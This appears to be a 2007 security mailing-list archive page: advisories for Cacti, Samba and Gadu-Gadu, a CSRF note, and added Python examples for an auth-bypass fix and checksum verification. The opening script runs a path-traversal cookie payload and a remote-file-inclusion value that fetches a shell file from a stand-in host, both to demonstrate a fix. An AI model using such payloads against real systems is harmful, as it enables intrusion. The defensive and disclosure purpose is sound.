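    os.makedirs(os.path.join(root, "db", "users"))
    pw_hash = hashlib.md5(b"constructed-password").hexdigest()
    open(os.path.join(root, "db", "users", "Nick" + pw_hash + ".php"), "w").close()
    open(os.path.join(root, "db", "admin", "Boss" + pw_hash + ".php"), "w").close()
    return root, pw_hash


def admin_dir(root: str) -> str:
    return os.path.join(root, "db", "admin")


if __name__ == "__main__":
    root, h = build_fixture()
    tab = admin_dir(root)
    print("Nick, honest cookie   :", vigile_is_admin(tab, "Nick", h))
    print("Nick, traversal cookie:", vigile_is_admin(tab, "/../users/Nick", h))
    print("same, with the fix    :", is_admin_fixed(tab, "/../users/Nick", h))
    print("Boss, with the fix    :", is_admin_fixed(tab, "Boss", h))
    print("RFI value resolves to :", rfi_target("http://evil.example/shell.txt?"))
    shutil.rmtree(root)
```

The allow-list on the nick is what blocks the cookie payload; the realpath containment check is the second layer, there for the day the allow-list is loosened. Note that an os.path.join() would not reproduce the CMS's behaviour here, since a leading "/" in the user part makes join discard the base entirely, which is why the mirror uses plain concatenation like the PHP does.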


Using CSRF to Attack Mobile Phones

2007-11-22 Thread avivra
CSRF can be used to cause denial-of-service attacks against mobile phones by
flooding the phone with SMS and service messages. 
Mobile phone service providers in Israel, and throughout the world, provide
a web interface to send SMS messages. Fortunately, they limit the SMS
sending web interface to 20 messages per day, and they also require the user
to authenticate in order to send an SMS.
Unfortunately, at least when referring to the Israeli providers, they also
give attackers a way to send endless SMS and service messages without any
kind of authentication and with a simple HTTP request.

More information:
http://aviv.raffon.net/2007/11/22/UsingCSRFToAttackMobilePhones.aspx 



[ MDKSA-2007:231 ] - Updated cacti packages fix SQL injection vulnerability

2007-11-22 Thread security

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:231
 http://www.mandriva.com/security/
 ___
 
 Package : cacti
 Date: November 22, 2007
 Affected: Corporate 4.0
 ___
 
 Problem Description:
 
 An SQL injection vulnerability in cacti may allow remote attackers
 to execute arbitrary SQL commands.
 
 The updated packages have been patched to correct this issue.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6035
 ___
 
 Updated Packages:
 
 Corporate 4.0:
 7747b05a689d987c089670ae2f02d8e1  
corporate/4.0/i586/cacti-0.8.6f-3.3.20060mlcs4.noarch.rpm 
 bde23b14c6a6de25adecb10eb87e5c00  
corporate/4.0/SRPMS/cacti-0.8.6f-3.3.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 14628544bb359a37a58740b082fd14bb  
corporate/4.0/x86_64/cacti-0.8.6f-3.3.20060mlcs4.noarch.rpm 
 bde23b14c6a6de25adecb10eb87e5c00  
corporate/4.0/SRPMS/cacti-0.8.6f-3.3.20060mlcs4.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)

iD8DBQFHRb1amqjQ0CJFipgRAgaOAKDJDmFCgplzKC/JCQvE6HZi+HmRvwCfaQ9f
TleLUlRzgRRqFncHeHYSz3s=
=RAYU
-----END PGP SIGNATURE-----



Gadu-Gadu Local/Remote Buffer Overflow vulnerability

2007-11-22 Thread j00ru . vx
Team Vexillium

Security Advisory

http://vexillium.org/


Name : Gadu-Gadu

Class: Buffer Overflow

Threat level : VERY HIGH

Discovered   : 2007-11-10

Published: 2007-11-22

Credit   : j00ru//vx

Vulnerable   : Gadu-Gadu 7.7 [Build 3669], prior versions may also be affected.



==[ Abstract ]==


Gadu-Gadu is a free internet communicator used by millions of Polish people.

It allows users to talk to, hear and even see other internauts through the net.

It also supports the possibility of expressing feelings using some provided 

emoticons. These emoticons' strings, with associated graphic filenames, are 

stored in the emots.txt file. 

The GG client is vulnerable to a buffer overflow attack in the code

that moves the emots.txt file data to some local buffers. The program 

doesn't check whether the size of the data to move is greater than the size 

of the destination buffer. Successful exploitation may lead to arbitrary 

code execution or denial of service of the process (gg.exe termination).



==[ Details ]== 


The function vulnerable to the attack is located at address 0x00443CE2:


.text:00443CE2 HandleEmotsConfig proc near             ; CODE XREF: sub_4A55F6:loc_4A5C90p
.text:00443CE2                 mov     eax, offset loc_561ECC
.text:00443CE7                 call    __EH_prolog
.text:00443CEC                 mov     eax, 26588
.text:00443CF1                 call    __alloca_probe
.text:00443CF6                 push    ebx
.text:00443CF7                 lea     eax, [ebp-24h]
.text:00443CFA                 push    esi
.text:00443CFB                 push    eax
.text:00443CFC                 call    sub_443A9E
.text:00443D01                 xor     esi, esi
(...)


It is responsible for opening the \emots\_NUMBER_\emots.txt files and then reading

information about emoticons and their graphic equivalents. This is what an example 

line of the configuration file looks like:


("emoticon","emoticon",...),"graphic_file.gif","graphic_file.gif"


If there's only one string associated with a gif file, the brackets can be skipped.

Also the third part of the line isn't essential - it's just the name of an optional 
graphic file in NETSCAPE GIF format. 

During the process of copying data from the currently opened file (2nd and 3rd part 
of the configuration line) to some local buffers, the program doesn't check the

strings' lengths, which can lead to overwriting the 500-byte buffers placed on 
the stack.


The vulnerable code that copies the name of the first gfx file is shown below:


.text:00443E37 loc_443E37:                             ; CODE XREF: HandleEmotsConfig+164j
.text:00443E37                 cmp     al, '"'
.text:00443E39                 jz      short loc_443E48
.text:00443E3B                 mov     [ecx], al
.text:00443E3D                 inc     ecx
.text:00443E3E                 inc     edi
.text:00443E3F                 mov     [ebp-18h], edi
.text:00443E42
.text:00443E42 loc_443E42:                             ; CODE XREF: HandleEmotsConfig+153j
.text:00443E42                 mov     al, [edi]
.text:00443E44                 cmp     al, 20h
.text:00443E46                 jnb     short loc_443E37


As you can see, there's no size limitation of the data being moved.

It's, in fact, the same situation in the second piece of code:


.text:00443E87 loc_443E87:                             ; CODE XREF: HandleEmotsConfig+1B6j
.text:00443E87                 cmp     cl, '"'
.text:00443E8A                 jz      short loc_443E9F
.text:00443E8C                 mov     [eax], cl
.text:00443E8E                 inc     eax
.text:00443E8F                 inc     edi
.text:00443E90
.text:00443E90 loc_443E90:                             ; CODE XREF: HandleEmotsConfig+1A3j
.text:00443E90                 mov     cl, [edi]
.text:00443E92                 cmp     cl, ' '
.text:00443E95                 mov     [ebp-18h], edi
.text:00443E98                 jnb     short loc_443E87



A proof-of-concept file created during this research exploits bugs in the filename

copying code, but it is also possible to execute arbitrary code using a buffer 

overflow in other places in the function - the ones responsible for moving data such as 

the strings describing the emoticons and so on.


When copying data using the code shown above, the values of some local variables, 
return addresses etc. may be overwritten. Modification of the proper amount of stack 
data causes an exception. There are several reasons for the exception being generated. 
It can happen when the filename placed in emots.txt is longer than the size of the stack, 

or in a function at address 0x0052F5D0, called by the emoticon parsing code:


.text:00443EEE                 call    unknown_libname_52 ; Microsoft VisualC 2-8/net runtime


To be more precise, the instruction at 0x0052F62A causes an exception, because

the EDI register value is zero at that moment:


.text:0052F62A                 rep movsd

Among all the data we are able to 

[SECURITY] [DSA 1409-1] New samba packages fix several vulnerabilities

2007-11-22 Thread Steve Kemp
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- 
Debian Security Advisory 1409[EMAIL PROTECTED]
http://www.debian.org/security/   Steve Kemp
November 22, 2007 http://www.debian.org/security/faq
- 

Package: samba
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2007-4572, CVE-2007-5398

Several local/remote vulnerabilities have been discovered in samba,
a LanManager-like file and printer server for Unix. The Common
Vulnerabilities and Exposures project identifies the following problems:

CVE-2007-5398

   Alin Rad Pop of Secunia Research discovered that nmbd did not properly
   check the length of netbios packets. When samba is configured as a WINS
   server, a remote attacker could send multiple crafted requests resulting
   in the execution of arbitrary code with root privileges.

CVE-2007-4572
   Samba developers discovered that nmbd could be made to overrun a buffer
   during the processing of GETDC logon server requests.  When samba is
   configured as a Primary or Backup Domain Controller, a remote attacker
   could send malicious logon requests and possibly cause a denial of
   service.

For the stable distribution (etch), these problems have been fixed in
version 3.0.24-6etch5.

For the old stable distribution (sarge), these problems have been fixed in
version 3.0.14a-3sarge7.

For the unstable distribution (sid), these problems have been fixed in
version 3.0.27-1.

We recommend that you upgrade your samba packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- 

Source archives:

  
http://security.debian.org/pool/updates/main/s/samba/samba_3.0.14a-3sarge7.diff.gz
Size/MD5 checksum:   126599 dd69715fbe533f86261dba9c6df4121b
  http://security.debian.org/pool/updates/main/s/samba/samba_3.0.14a.orig.tar.gz
Size/MD5 checksum: 15605851 ebee37e66a8b5f6fd328967dc09088e8
  http://security.debian.org/pool/updates/main/s/samba/samba_3.0.14a-3sarge7.dsc
Size/MD5 checksum: 1081 9d0458572d346c0007f5ad69f5884f0d

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/s/samba/samba-doc_3.0.14a-3sarge7_all.deb
Size/MD5 checksum: 12117138 fddb40f38a2fa55babbb4dc80c5fc67b

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/s/samba/libsmbclient_3.0.14a-3sarge7_alpha.deb
Size/MD5 checksum:   660190 52f63b13c5a43948920c686767178471
  
http://security.debian.org/pool/updates/main/s/samba/samba-dbg_3.0.14a-3sarge7_alpha.deb
Size/MD5 checksum: 20269910 1ceef52818b1beedf40bd4da1c510a93
  
http://security.debian.org/pool/updates/main/s/samba/libpam-smbpass_3.0.14a-3sarge7_alpha.deb
Size/MD5 checksum:   402276 41642d0e295f9fbbeea6a7325b305096
  
http://security.debian.org/pool/updates/main/s/samba/swat_3.0.14a-3sarge7_alpha.deb
Size/MD5 checksum:  4223920 5231db946b3527c24c860a9100819b6e
  
http://security.debian.org/pool/updates/main/s/samba/winbind_3.0.14a-3sarge7_alpha.deb
Size/MD5 checksum:  1824694 b9e8dd0b3eeefa6aac54648290506520
  
http://security.debian.org/pool/updates/main/s/samba/samba_3.0.14a-3sarge7_alpha.deb
Size/MD5 checksum:  3129116 cc5b557ba1ae5b2fd791215e782db96b
  
http://security.debian.org/pool/updates/main/s/samba/smbclient_3.0.14a-3sarge7_alpha.deb
Size/MD5 checksum:  3251528 8e835a384359a4662beae0f84de0b396
  
http://security.debian.org/pool/updates/main/s/samba/python2.3-samba_3.0.14a-3sarge7_alpha.deb
Size/MD5 checksum:  5238590 0185e710feb3e56007be537744db93fe
  
http://security.debian.org/pool/updates/main/s/samba/samba-common_3.0.14a-3sarge7_alpha.deb
Size/MD5 checksum:  2409008 46477a46365492bcb50610eadf5b2758
  
http://security.debian.org/pool/updates/main/s/samba/smbfs_3.0.14a-3sarge7_alpha.deb
Size/MD5 checksum:   459612 f013c425117b90a440b9670204d062ad
  
http://security.debian.org/pool/updates/main/s/samba/libsmbclient-dev_3.0.14a-3sarge7_alpha.deb
Size/MD5 checksum:  1015522 7cceff444f8053c998e307d0e3bbd0ba

arm architecture (ARM)

  
http://security.debian.org/pool/updates/main/s/samba/smbclient_3.0.14a-3sarge7_arm.deb
Size/MD5 checksum:  2599536 8ae40ec58f87a12bd2101132fa1dde9a
  
http://security.debian.org/pool/updates/main/s/samba/winbind_3.0.14a-3sarge7_arm.deb
Size/MD5 checksum:  1484914 6795a1c5c38080bb7402d70745e396bc
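For the wget / dpkg -i route the instructions above describe, a check of downloaded files against the Size/MD5 lines. This is an added example, not Debian or Mandriva tooling (apt-get and urpmi verify packages themselves): it parses both the DSA layout (a URL line followed by a Size/MD5 checksum line) and the MDKSA layout (md5 followed by the package path) and then compares size and digest of whatever sits in a download directory. The directory and the advisory excerpt are constructed: the one file that verifies holds a few bytes, and the excerpt quotes that file's own digest, not the real package's.

```python
"""Checking downloaded packages against the Size/MD5 lines of an advisory.

Added example, not Debian or Mandriva tooling.  The advisory excerpt and the
package files below are constructed: the "good" file holds a few bytes and
the excerpt quotes that file's real digest; the other entries reuse lines
quoted in the DSA and MDKSA above and are deliberately absent or wrong.
"""
import hashlib
import os
import re
import tempfile

# Debian layout: a URL line, then "Size/MD5 checksum:  SIZE  MD5".
DEBIAN_RE = re.compile(
    r"(?P<url>\S+/(?P<name>[^/\s]+\.(?:deb|dsc|diff\.gz|orig\.tar\.gz)))\s+"
    r"Size/MD5 checksum:\s+(?P<size>\d+)\s+(?P<md5>[0-9a-f]{32})"
)
# Mandriva layout: "MD5  path/to/file.rpm" (no size is given).
MANDRIVA_RE = re.compile(r"(?P<md5>[0-9a-f]{32})\s+(?P<path>\S+/(?P<name>[^/\s]+\.rpm))")


def parse_advisory(text: str) -> dict:
    """Map package file name -> (md5, size or None) for both advisory styles."""
    expected = {}
    for m in DEBIAN_RE.finditer(text):
        expected[m.group("name")] = (m.group("md5"), int(m.group("size")))
    for m in MANDRIVA_RE.finditer(text):
        expected[m.group("name")] = (m.group("md5"), None)
    return expected


def md5_file(path: str) -> str:
    h = hashlib.md5()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_downloads(expected: dict, directory: str) -> dict:
    """Return name -> 'ok' | 'missing' | 'size mismatch' | 'md5 mismatch'."""
    results = {}
    for name, (md5, size) in expected.items():
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            results[name] = "missing"
        elif size is not None and os.path.getsize(path) != size:
            results[name] = "size mismatch"
        elif md5_file(path) != md5:
            results[name] = "md5 mismatch"
        else:
            results[name] = "ok"
    return results


def build_fixture():
    """Constructed download directory plus an advisory excerpt that matches it."""
    d = tempfile.mkdtemp(prefix="dsa-")
    good = b"not really a .deb, just constructed bytes\n"
    with open(os.path.join(d, "samba-doc_3.0.14a-3sarge7_all.deb"), "wb") as f:
        f.write(good)
    with open(os.path.join(d, "samba_3.0.14a-3sarge7_alpha.deb"), "wb") as f:
        f.write(b"tampered\n")          # wrong size, so never even hashed
    excerpt = (
        "  http://security.debian.org/pool/updates/main/s/samba/samba-doc_3.0.14a-3sarge7_all.deb\n"
        f"    Size/MD5 checksum: {len(good):8d} {hashlib.md5(good).hexdigest()}\n"
        "  http://security.debian.org/pool/updates/main/s/samba/samba_3.0.14a-3sarge7_alpha.deb\n"
        "    Size/MD5 checksum:  3129116 cc5b557ba1ae5b2fd791215e782db96b\n"
        "  http://security.debian.org/pool/updates/main/s/samba/swat_3.0.14a-3sarge7_alpha.deb\n"
        "    Size/MD5 checksum:  4223920 5231db946b3527c24c860a9100819b6e\n"
        " 4b52bbf1bcea6c92e5e27e4b3be9921c  2007.0/i586/libsmbclient0-3.0.23d-2.5mdv2007.0.i586.rpm\n"
    )
    return d, excerpt


if __name__ == "__main__":
    d, excerpt = build_fixture()
    for name, status in verify_downloads(parse_advisory(excerpt), d).items():
        print(f"{status:14} {name}")
```

The size check runs before the digest so a truncated download is reported as such rather than as a bad hash. The MD5 in the advisory only ties the file to the advisory text; trust in the list itself comes from the PGP signature on the mail, which this script does not replace.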

Re: Gadu-Gadu Local/Remote Buffer Overflow vulnerability

2007-11-22 Thread gg_vuln
Hello,


1. You didn't write the OS specification. Was it Win XP or Vista? Which language? 
Was it fully patched? Was DEP turned on? Have you tried it as a privileged user?


2. Why did you write VERY HIGH threat? This is a local buffer overflow. Moreover, 
the user has to replace the original file. This vulnerability has more to do with SE :(.


3. I haven't debugged this overflow event; could you tell me how many bytes 
you can parse?


Nice find.


Cheers,

JD